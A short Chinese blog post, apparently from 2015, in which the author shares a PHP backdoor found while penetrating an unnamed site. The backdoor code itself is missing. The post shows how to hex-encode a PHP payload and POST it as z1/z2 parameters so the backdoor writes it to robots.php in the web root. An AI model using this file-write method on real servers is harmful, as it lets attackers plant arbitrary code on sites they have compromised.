Tuuu Nya's Blog

分享一款遇到的PHP后门

字数统计: 108阅读时长: 1 min
2015/10/16 Share

这个后门是我在渗透某站时遇到的

代码

代码分析

利用方式

先把要写入的内容URL编码,比如:

编码后:
%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E
然后去掉里面的百分号(%)得到:
3C3F70687020706870696E666F28293B203F3E
然后给我们的后门POST内容:
z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到我们的phpinfo已经写入到根目录下的robots.php:

CATALOG
  1. 1. 代码
  2. 2. 代码分析
  3. 3. 利用方式